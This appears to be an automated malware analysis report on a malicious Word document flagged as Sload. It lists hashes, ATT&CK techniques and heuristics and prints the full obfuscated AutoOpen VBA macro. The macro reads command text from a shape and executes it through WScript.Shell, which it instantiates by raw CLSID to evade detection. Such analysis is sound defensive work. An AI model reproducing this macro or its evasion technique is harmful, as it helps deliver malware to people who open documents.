Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a9e0b8c46653d577…

MALICIOUS

Office (OLE)

145.4 KB Created: 2018-11-28 09:45:00 Authoring application: Microsoft Office Word First seen: 2019-06-27
MD5: 4122bceede6abac8f82d20f5b0bc9a22 SHA-1: 1a4e02a15761c632ccc8f36358359f2da4fcf35e SHA-256: a9e0b8c46653d577ad42671a47517cdc46ea4c9ee322f3f584537ce9fa5d0e06
252 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoOpen macro and the instantiation of the dangerous COM class 'WScript.Shell' indicate that the macro is designed to execute arbitrary code. The heuristic 'SC_STR_POWERSHELL' suggests that PowerShell may be involved in the execution chain, likely to download and run a second-stage payload from a remote source. The presence of a benign URL in the document body does not detract from the malicious nature indicated by the heuristics and macro.

Heuristics 9

  • ClamAV: Doc.Malware.Sload-6791731-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sload-6791731-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script
    Next
Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB)
   On Error Resume Next
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Next
Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB)
   On Error Resume Next
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8742 bytes
SHA-256: da24bb15a60194cd66c5415a9e0e661d8a96b851fa45402824f8d4547a1e201d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
208 of 295 identifiers look randomly generated (e.g. 'osktKaFUXp') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "vhzBiAsI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
Select Case izViuOZ
      Case 268899346
         maoSU = CBool(FvEonQo)
         XoMRQ = 334475000
      Case 245552943
         EalQcfoGw = Atn(ElwQYj)
         icAjK = Atn(119083460 * CLng(36534801))
   End Select
         For Each vwphzIqZv In OhDzZHz
         WLDEGPfJi = kKtHfWh * CDate(wYAIOMCu * zDlCsi) * vtqqrZ / Sin(naTok) / GChPsIZ + 276062484 - 94294734 + Chr(322851336) + (BLEjFzTsc * MlfrpYW)
Next
   On Error Resume Next
Select Case YoNTpTtW
      Case 104436401
         uPFEIBCIR = CBool(jjAECaEnu)
         wPFiKo = 226015111
      Case 299598317
         UoibiaKR = Atn(GWvvSZDr)
         IRPPFbAB = Atn(202386975 * CLng(67058912))
   End Select
         For Each tTSIWwJ In EVisI
         hYTBzj = TAZbXFiC * CDate(dvzurmD * YVQwmSiZ) * uYDhz / Sin(drZTtjzq) / CdsisNc + 308353349 - 140745332 + Chr(210210827) + (bQhhhvC * KKzudO)
Next
   On Error Resume Next
Select Case CjtjpObWC
      Case 341386355
         lXHNK = CBool(rwjAP)
         bNXwWjG = 85682922
      Case 205692240
         jRarkLJVl = Atn(mNjnDjJ)
         FitzmLSTR = Atn(117835737 * CLng(34744277))
   End Select
         For Each wmavqpnTV In mLPllNik
         nWPHBwjfO = RtrQvhz * CDate(nwNvqVZr * hAZEpjYS) * jfZwHK / Sin(tEmvvUE) / aqnfrjui + 64035469 - 94693720 + Chr(10399320) + (oVbNSzb * UNopC)
Next
   On Error Resume Next
Select Case tHIItZ
      Case 218004345
         bpAZta = CBool(aLiGBW)
         SKmYUdz = 66299889
      Case 80709632
         jlpHMNRl = Atn(zzNvBszwa)
         omfvR = Atn(265656441 * CLng(327590924))
   End Select
         For Each UFDPRdN In HkENzRUGX
         FOkjWhX = YzDqY * CDate(Prwjrj * khLkNsML) * RYXmjjl / Sin(iVsRFNmR) / lwGUoP + 260287876 - 336874450 + Chr(139337713) + (ZvJpKpBi * SljjGIwV)
Next
Set uYSTEzWV = Shapes("IHEZACs")
   On Error Resume Next
Select Case NjFXKkiWC
      Case 325245663
         ijjJPh = CBool(GKzSIh)
         hBXUGohOf = 82251888
      Case 24770817
         bnpLULRCi = Atn(czitKTju)
         YXjcjGBwI = Atn(219142162 * CLng(100636164))
   End Select
         For Each UFZGZ In zdGqfM
         ZZlMiOikR = RuKFFSO * CDate(VPjHs * nlChR) * isUjJjQk / Sin(TjUCaHL) / LtLrhJ + 320707644 - 103654818 + Chr(115368512) + (bYsLAScw * aiwYCii)
Next
   On Error Resume Next
Select Case QKjVz
      Case 43045712
         HBAuhFnUm = CBool(BrnpHObVV)
         jBzcIqZbq = 17823492
      Case 87185052
         CJMtiuw = Atn(VjPiCDpUJ)
         EAbLTGCYm = Atn(280736370 * CLng(209717939))
   End Select
         For Each ijmXoi In NkhWYZz
         UZEBESuz = CqpGrF * CDate(IRJFf * iOLrwKXdC) * WUhwhpbt / Sin(lZVzoWVi) / OHPsGcu + 274905225 - 275560770 + Chr(83049922) + (jajzETm * GZSpP)
Next
   On Error Resume Next
Select Case kPHwU
      Case 188777673
         HAvSTjX = CBool(vjVQMiM)
         VTcqJ = 4474450
      Case 194759069
         wAPHfwhz = Atn(KiXJkNm)
         OaCGW = Atn(79778352 * CLng(160164887))
   End Select
         For Each JmcrlNG In OUTRPzz
         WoBwowlFq = vabZbnrj * CDate(JFHqzbA * PtUoQaDki) * biMBXB / Sin(SjvosfZfb) / tOzDVoBVM + 140016978 - 331826834 + Chr(201885707) + (YotcPBJHi * rfuEF)
Next
osktKaFUXp = "" + FRBbX + GwBjXQsz + lHjBa + kkPVINC + uYSTEzWV.TextFrame.TextRange.Text + DMPZwV + MjvpDN + NTtvCL
   On Error Resume Next
Select Case WlGaJQQU
      Case 14565301
         pQzVwIHI = CBool(vWZwkfnW)
         HwpjDbVw = 137995964
      Case 212908756
         SbaMIIzwi = Atn(jrvwMNw)
         VuWudNFw = Atn(60217634 * CLng(81824038))
   End Select
         For Each ACnbMPU In NnciqsObF
         jrOYHzlZY = NGJwkbiWt * CDate(ihsQjA * LjBPlAEZV) * bvopn / Sin(WiGidwPOr) / pLCwzpGF + 169325134 - 295893508 + Chr(146527766) + (bFFZPUCb * ZvqWi)
Next
   On Error Resume Next
Select Case cczLfVbJ
      Case 176276797
         cJutZFsES = CBool(fiGMAqjv)
         GGQrvnk = 247390719
      Case 201777419
         GGAzwktz = Atn(qhdFhj)
         tVlKo = Atn(251584830 * CLng(211695749))
   End Select
         For Each TpMSzGpT In XMfilH
         HsRFvcB = IstOATrT * CDate(TdJXbwL * NQhVD) * INJDvUa / Sin(rodJGNaT) / fsEKIwEfu + 43565885 - 27666506 + Chr(222339585) + (TNEVlB * QvzzimUtR)
Next
   On Error Resume Next
Select Case fHzdMGW
      Case 8242733
         tRjuli = CBool(tKwFtPoC)
         AdrmqkpH = 181229746
      Case 321342769
         ihAzmc = Atn(zABJXFC)
         iwjkPTwzM = Atn(189022450 * CLng(202135788))
   End Select
         For Each aIccTo In FLJBTQ
         qCiqGlkwC = arhuikoUH * CDate(wpYYqi * zhYuNTXd) * SVWtidFiC / Sin(HWXaUhL) / vBdGA + 152156923 - 316802110 + Chr(257970484) + (iwMYJR * STzOjSjp)
Next
Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB)
   On Error Resume Next
Select Case CElfaY
      Case 62706517
         CaRPXKYG = CBool(Jhjtd)
         tzOwHF = 21487974
      Case 92277803
         wcvztY = Atn(bztaJnE)
         vctXm = Atn(226330532 * CLng(228305583))
   End Select
         For Each YqriMa In dzMDQ
         OaNhnGjzD = GsICf * CDate(fbfPIW * BqKAz) * bwjnLj / Sin(fqzbB) / UmkqDX + 149034467 - 117146679 + Chr(129961640) + (XAmrTLrc * ikcHX)
Next
Const ipSCmF = 0
   On Error Resume Next
Select Case LZzww
      Case 169309393
         kimjfz = CBool(DGHzDZqt)
         DaACsStw = 238053714
      Case 209070610
         jWGApIcPp = Atn(JhbTG)
         dtiBRSut = Atn(146135219 * CLng(311932530))
   End Select
         For Each bRpqzAA In jAGHv
         aDYutZimj = CFihOc * CDate(iulBwz * KhaLZj) * liEqOVz / Sin(Vopiant) / TtEncNK + 309255484 - 187528254 + Chr(26041690) + (kLwWM * sRWZqAGNB)
Next
   On Error Resume Next
Select Case BfjhsItP
      Case 201060592
         YVUjLbB = CBool(muQfMlij)
         YjADFbp = 257050929
      Case 220102396
         ilUZkNfSi = Atn(JmoaJFE)
         WTwDIi = Atn(139072756 * CLng(234497440))
   End Select
         For Each VStfwdc In uSUjRhS
         GTlrauAXV = OAbcpE * CDate(jJzpw * ILDOnj) * ElfICLjr / Sin(bSVJf) / bvRcPf + 229547790 - 161075755 + Chr(125047724) + (HFdfW * NoiLcVTa)
Next
   On Error Resume Next
Select Case rVcHmVwLR
      Case 165092232
         uLpEivEJ = CBool(EOAbhMcA)
         AZzjaHBtL = 327189517
      Case 150085079
         CThUzZpG = Atn(rufKqcVA)
         ZtwTRzh = Atn(72769006 * CLng(249244612))
   End Select
         For Each CpjGnFBu In HimmuG
         iTYki = slXdmjCh * CDate(onHDwIos * oiCtr) * GBMJUNmB / Sin(WwwiJ) / SslTuz + 205039892 - 278859205 + Chr(66489144) + (qaTvw * zukXlWt)
Next
   On Error Resume Next
Select Case DjpozQb
      Case 135559299
         fzTwZPK = CBool(wWhWW)
         abzATJwAG = 123948729
      Case 250959929
         uPbwvsO = Atn(hzpwfJ)
         ZIsnw = Atn(219392154 * CLng(276894936))
   End Select
         For Each NzQHLi In rAKwUud
         apIBJ = lDVKEXr * CDate(fntEzN * fkDqBGpmj) * JvFSzqfj / Sin(buuzGGnd) / WFQuPEv + 32917837 - 31400386 + Chr(75411343) + (XwQoW * cmuhzNXNm)
Next
   On Error Resume Next
Select Case RfXPw
      Case 331273846
         clNNGdiE = CBool(ZkSWaP)
         iVQRMCM = 5533935
      Case 206096767
         wLMaiaF = Atn(JAGJd)
         kiqvqW = Atn(302174151 * CLng(227870935))
   End Select
         For Each Dotjj In ZZMijjT
         luKNQROVZ = wjiMQKIcO * CDate(JlktY * jbtbtlRm) * BjJcQ / Sin(hPBizpNI) / ZHSKi + 2620546 - 67353657 + Chr(109089789) + (kimbzwNP * IPiwzzVbV)
Next
OXVvXFKL.Run# osktKaFUXp, ipSCmF
   On Error Resume Next
Select Case jXVizq
      Case 283743391
         YUUXWNT = CBool(hipktz)
         LQofBYn = 283266474
      Case 299920648
         lNObiG = Atn(bdoGA)
         lFwHs = Atn(165923603 * CLng(142252333))
   End Select
         For Each VjwKNLL In BldbLkzF
         zbjJPLTL = CaFQu * CDate(XhQdPQ * vzlbDdZ) * AFqXtzpUF / Sin(fwDIljk) / LDdUWpSij + 232538690 - 156906645 + Chr(261687065) + (plOBU * tBUiNK)
Next
   On Error Resume Next
Select Case MtwwGaiM
      Case 243799386
         Ntjrk = CBool(hBBMbdsj)
         Ddscij = 105893297
      Case 74548497
         MztjXZjEX = Atn(fBvIcSz)
         jLMjBSdDw = Atn(248919421 * CLng(236078397))
   End Select
         For Each Zzhhf In mzicfWFX
         SIVQK = ljzmcvb * CDate(TduVQ * hUNcpjBQG) * qdiQKvaV / Sin(bnQhuDr) / rKzlBo + 178358327 - 132519088 + Chr(334010902) + (tbdcVaUwz * KvYCYv)
Next
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.